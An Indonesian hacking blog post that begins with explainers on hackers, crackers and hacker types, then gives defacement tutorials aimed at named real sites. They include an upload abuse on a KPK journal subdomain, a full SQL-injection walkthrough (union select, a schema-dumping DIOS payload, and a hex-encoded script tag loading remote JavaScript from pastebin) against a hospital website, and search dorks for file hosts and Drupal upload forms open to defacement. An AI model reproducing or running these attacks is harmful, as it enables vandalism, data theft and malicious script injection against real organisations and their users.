Perbedaan Hacker dan Cracker

1. Perbedaan Hacker Dengan Cracker

-Hacker

hacker adalah istilah untuk seseorang yang mempelajari, memodifikasi, menganalisa dan masuk ke sebuah jaringan komputer. Tujuan hacker mencari keuntungan atau bisa juga hanya sebagai tantangan semata.Dalam artian, aktivitas yang dilakukan tersebut hanya untuk menguji seberapa dalam ilmu hacking yang telah mereka pelajari.

-Cracker

Cracker dapat diartikan sebagai orang-orang yang memiliki kemampuan dalam bidang pemrograman dan dapat membuka sistem jaringan komputer dengan tujuan negatif, adapun cracking adalah sebutan untuk aktifitas yang dilakukan oleh cracker. Misalnya saja demi kejahatan, pencurian data penting untuk menjualnya kepada pihak tertentu, dan semacamnya.

-Perbedaan hacker dengan cracker

Hacker memiliki komunitas yang jelas serta terbuka agar mereka bisa memperdalam lagi ilmu pemrograman yang mereka miliki. Bahkan hacker juga tak segan-segan membagikan ilmu mereka kepada orang yang memang layak dan serius menekuni dunia tersebut.

Sedangkan cracker sendiri tidak seterbuka itu. Komunitas yang ada sangat tertutup, tersembunyi dan hanya dapat diakses oleh beberapa orang tertentu saja. Karena memang itu tadi, tujuan dari adanya cracker yang sudah jelas negatif membuat mereka harus sangat jeli dan tidak boleh melakukan kesalahan yang berakibat fatal pada diri sendiri.

Mengenal jenis-jenis hacker

Peretas atau hacker saat ini sering dikaitkan sebagai penjahat cyber yang akan merugikan banyak pihak. Namun pada kenyataannya, tidak semua peretas menggunakan skill mereka untuk tujuan yang buruk. Ada 7 Jenis Hacker,.tapi yg gw bahas disini yg umum nya aja 4 jenis hacker Yang perlu di ketahui.

1.Script kiddies
Script kiddies adalah individu tidak terampil yang menggunakan skrip atau program yang dikembangkan oleh orang lain untuk menyerang sistem dan jaringan komputer dan merusak situs web , seperti shell web,Secara umum diasumsikan bahwa sebagian besar skrip anak-anak adalah remaja yang tidak memiliki kemampuan untuk menulis program canggih atau eksploitasi sendiri dan bahwa tujuan mereka adalah untuk mencoba mengesankan teman-teman mereka atau mendapatkan kredit di komunitas penggemar komputer.
Serangan cyber yang paling umum oleh script kiddies mungkin termasuk serangan DoS dan DDoS.
Untuk diketahui, serangan DoS adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sehingga komputer tidak dapat menjalankan fungsinya dengan benar.

2.Black Hat Hacker
hacker yang masuk dalam kategori Black Hat adalah mereka yang melakukan hacking dengan cara meretas sistem atau program secara ilegal. mereka melakukan hacking untuk mengambil data pribadi pengguna internet seperti password dan data pribadi lainnya. Mereka juga terkadang menyebarkan virus pada perangkat lain.
Dari data pribadi yang dicuri tersebut mereka bisa mendapatkan keuntungan yang besar. Data data tersebut jika dijual bisa memiliki harga yang sangat tinggi. Tindakan tersebut jelas merugikan dan membahayakan sistem yang diretas.

3.White Hat Hacker
Selain Black Hat hacker, ada juga White Hat hacker. Bisa dibilang White Hat adalah kebalikan dari Black Hat. Jika Black Hat menggunakan kemampuan hacking untuk mencuri data pribadi dan tindakan kriminal lainnya, White Hat justru sebaliknya.Mereka berusaha meretas sistem atau program untuk bisa menemukan celah keamanannya. White Hat juga bekerja sesuai dengan peraturan dan melalui metode yang legal. Dengan tujuan ini, White Hat sering disebut sebagai good hacker.Umumnya, White Hat direkrut oleh sebuah perusahaan untuk bekerja sama dengan tim developer. White Hat akan mencari celah keamanan dari sistem yang dibuat developer. Dengan demikian, sistem yang dibuat pun bisa lebih aman dan risiko kebocoran datanya dapat di minimalisir.

4.Grey Hat Hacker
di antara Black Hat dan White Hat pun terdapat golongan hacker tersendiri.Mereka disebut dengan Grey Hat.mereka beroperasi dengan mengombinasikan metode black hat dan white hat.
Misalnya, saat mereka meretas sebuah sistem atau program, Grey Hat melakukannya secara ilegal seperti Black Hat hacker. Namun, tidak seperti Black Hat hacker yang meninggalkan kerusakan pada sistem, Grey Hat mengembalikan sistem semula seperti White Hat hacker sehingga seolah tidak terjadi apa-apa pada sistem. Secara sederhana, dapat disimpulkan bahwa tujuan Grey Hat melakukan peretasan sistem adalah sekadar untuk uji coba.

Deface poc ojs(subdo kpk) - ACT

Welcome back mamank,kali ini we bagi deface poc ojs(open journal system) subdomain kpk.
Langsung in tutorial

Target:
https://jurnal.kpk.go.id/index.php/integritas/login

Daftar dulu woi

Pendaftaran limited,klo gk bisa daftar langsung login aja
User:
Pw:
Mau tau?cht me :v
Wa.me/+6283143494236

Klo udh login klik pengajuan baru/new submision

Kemudian section/bagian ganti articles and centang semua Submission Requirements/persyaratan pengajuan

Kemudian klik save and continue/simpan dan lanjukan
Next
Article component ganti dokument artikel utama,kemudian lu upload Script deface lu
note:gk berlaku buat Shell

Klo udh upload kemudian continue aja
Dan file lu dah ke upload

Cara manggil nya

https://jurnal.kpk.go.id/files/journals/1/articles/573/submission/573-1-1786-1-2-20200309.html

573 itu ganti dengan id lu cara cek id nya klik hasil upload lu nanti auto download

Kemudian 1786-1-2-20200309.html

Ganti dengan nama html lu

Hasil:

https://jurnal.kpk.go.id/files/journals/1/articles/577/submission/577-1-1790-1-2-20200310.html

Done

Sekian tq

Jenis dan tingkatan Hacker

1.Lammer

Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi peretas (wanna-be hacker). Mereka biasanya membaca, mendengar menonton film atau video tentang hacker dan ingin menjadi seperti mereka. Penggunaan komputer mereka hanyalah untuk main game, IRC, tukar-menukar perangkat lunak bajakan dan mencuri kartu kredit. Melakukan hacking menggunakan perangkat lunak trojan, nuke, dan DoS. Biasanya menyombongkan diri melalui IRC channel. Karena banyak kekurangan untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai tingkat developed kiddie atau script kiddie saja.


2.Script Kiddies

Seperti developed kiddie, Script Kiddie biasanya melakukan aktivitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan hidup pengguna Internet.


3.Developed Kiddies

Sebutan ini terutama karena umur kelompok ini masih muda (ABG) dan masih sekolah. Mereka membaca tentang metode hacking dan caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil dan memproklamasikan kemenangan ke peretas lainnya. Umumnya mereka masih menggunakan Grafic User Interface (GUI) dan baru belajar hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.


4.Semi Elite

Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya (vulnerability)). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker tingkat ini. Sialnya oleh para Elite mereka sering kali dikategorikan Lamer.


5.Elite

Juga dikenal sebagai 3l33t, 3l337, 31337, leet, 1337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka memahami sistem operasi sisi luar dalam, sanggup mengkonfigurasi dan menyambungkan jaringan secara global. Sanggup melakukan pemrograman setiap harinya. Sebuah anugerah yang sangat alami, mereka biasanya efisien & terampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman yang dapat memasuki sistem tanpa terdeteksi, walaupun mereka tidak akan menghancurkan data-data yang ditemui. Karena mereka selalu mengikuti peraturan yang ada.

Deface Poc SQL with dios - ACT

saya Mr.X-Notfound akan membagikan cara deface SQL chall/dios

•Dork
inurl:/berita.php?id= site.go.id

Yg pertama cari dork boleh apapun karena saya punya live target jadi engga usah

Live target
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1

Kemudian kasih tanda ' dibelakang syntax live target
Contoh :
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1'

Jika web tersebut vuln kita akan menemukan error atau gambar yg hilang contoh seperti gambar di atas

Next tmbh kan +order+by+1--+- di belakang web target
Contoh:
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+1--+-

(%27 abaikan saja)

Cari sampai error

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+1--+-

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+2--+-

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+3--+-

Dan seterunya

Disini saya error di bagian kolom 10
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1+order+by+10--+-

Nah lalu kita buat cara seperti ini
Order by ganti dengan union select
Contoh :
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,2,3,4,5,6,7,8,9,10--+-

Nah ada angka togel tuh, yaitu 2
Nah lalu kita dios deh
Contoh:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Lalu kita pastekan di angka togel td

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9,10--+-

Jadi gini deh,Keliatan kan DBnya
DB = data base
Lalu mari kita deface
Gua disini make dios deface gua

Klo lu blom ada bs lu pastein sc jso lu di sini
https://www.online-toolz.com/tools/text-hex-convertor.php

Nah klo udh lu msukin di angka togel itu
Contoh dios deface
0x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f48456b6461374475223e3c2f7363726970743e

Hasil

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,0x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f48456b6461374475223e3c2f7363726970743e,3,4,5,6,7,8,9,10--+-

Selesai deh
Sekian dr saya wassalamualaikum wr.wb

Deface Poc Kawaii file hosting - ACT

Tutor deface poc Kawaii file hosting bisa di bilang simple,bahan:
•dork:
intext:"kawaii file hosting"
intext:"select or drop file(s)"

Target vuln:
https://pomf.davebay.net/

Step
Ya dorking dulu mamank

Klo sudah,pilih salah satu web yg menurut lu vuln,klo sudah ya tinggal upload sc html lu

Done,gitu doang,.klo ada yg mudah kenapa milih yg sulit?
Hasil : https://pomf.davebay.net/files/f9r3rsd8.html

Tengkyu

Deface Poc Drupal hidden - ACT

Whatsapp mamank,back to me,ya materi hari ini gw bagi Deface poc Drupal hidden,oke lngsung aja kena we gk suka bacot

Dork :

allowed file type txt jpg html gif site:
allowed file types: png gif jpg txt site:gov
allowed file types: png gif jpg txt site:com
allowed file types: png gif jpg txt site:edu
(Site bisa di ganti domain negara lain, sesuai kemauan lu) 

1.seperti biasa dorking dulu,dork bebas 

2.pilih salah satu web, kemudian cari tempat upload Script pepes kalian contoh:

3.pilih file,klo sudah di unggah/upload kemudian klik nama Script deface lu

hasil nya kyk gini :

Oke, terimakasih,cuman share pengetahuan,. semoga bermanfaat